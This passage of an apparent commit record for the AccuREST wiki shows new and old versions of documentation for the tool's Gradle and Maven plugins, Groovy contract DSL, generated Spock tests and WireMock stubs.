\/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ for equality (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contain the passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` function tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\nThe **body's format** can also be specified explicitly by invoking one of the format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nA minimal response must contain an **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides the status, a response may contain **headers** and a **body**, which are specified the same way as in the request (see the previous paragraph).
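\n\nFor instance, a sketch of a response that combines all three elements (the values are illustrative):\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n urlPath('\/users\/john')\n }\n response {\n status 200\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n}\n----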
\n\n## Regular expressions\nYou can use regular expressions to write your requests in the Contract DSL. It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your tests and your server-side tests.\n\nPlease see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) })),\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}'))\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameters for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that matches the wrapped value 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\nIt is also possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration; see the Groovy DSL and Base Mock Spec examples earlier in this document.
\n\n# 9. Migration Guide\n\n## Migration to 0.4.7\n- in 0.4.7 we've fixed the package name (coderate to codearte) so you have to do the same in your projects. This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n## Migration to 1.0.0-RC1\n- from 1.0.0 we distinguish ignored contracts from excluded contracts:\n - the `excludedFiles` pattern tells Accurest to skip processing those files at all\n - the `ignoredFiles` pattern tells Accurest to generate contracts and tests, but the tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage*, resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage*, resulting in `basePackageForTests`.*subpackage* test package creation\n - If you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*","old_contents":":github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease follow the Introduction page to start your journey with Consumer Driven Contracts on the JVM\n\n# 1. Introduction\n\nTo make a long story short - AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It is shipped with a __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce the following resources:\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand, test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if the server-side implementation of the API is compliant with the contract (__server tests__). The full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) are doing exactly what the actual server-side implementation will do,\n - to promote the ATDD method and the Microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you need Wiremock in version at least **2.0.0-beta**. Of course, the higher the better :)\n\n# 2.1. Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you need Wiremock in version at least **2.0.0-beta**. 
Of course the higher the better :)\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n testCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: https:\/\/github.com\/Codearte\/accurest-maven-plugin[accurest-maven-plugin]\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. 
By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. 
If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. 
In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nAccurest Maven Plugins generates verification code into directory `\/generated-test-sources\/accurest` and attach this directory to `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke `mvn generateTest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using: `mvn generateStubs` command. By default generated WireMock mapping is stored in directory `target\/mappings`. Your project should create from this generated mappings additional artifact with classifier `stubs` for easy deploy to maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nContract DSL in AccuREST is written in Groovy, but don't be alarmed if you didn't use Groovy before. Knowledge of the language is not really needed as our DSL uses only a tiny subset of it (namely literals, method calls and closures). 
What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in example above. If you didn't find what you are looking for, please check next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nFollowing methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nHTTP protocol requires only **method and address** to be specified in a request. 
The same information is mandatory in request definition of AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify whole `url` instead of just path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nRequest may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n \/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ using identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contains passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` functions tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\n**Body's format** can also be specified explicitly by invoking one of format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nMinimal response must contain **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides status response may contain **headers** and **body**, which are specified the same way as in the request (see previous paragraph).\n\n## Regular expressions\nYou can use regular expressions to write your requests in Contract DSL. 
It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your test and your server side tests.\n\n Please see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) }))\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameter for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that should be present 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\nIt is also 
possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support JAX-RS 2 Client API. Base class needs to define `protected WebTarget webTarget` and server initialization, right now the only option how to test JAX-RS API is to start a web server.\n\nRequest with a body needs to have a content type set otherwise `application\/octet-stream` is going to be used.\n\nIn order to use JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nExample of a test API generated:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new 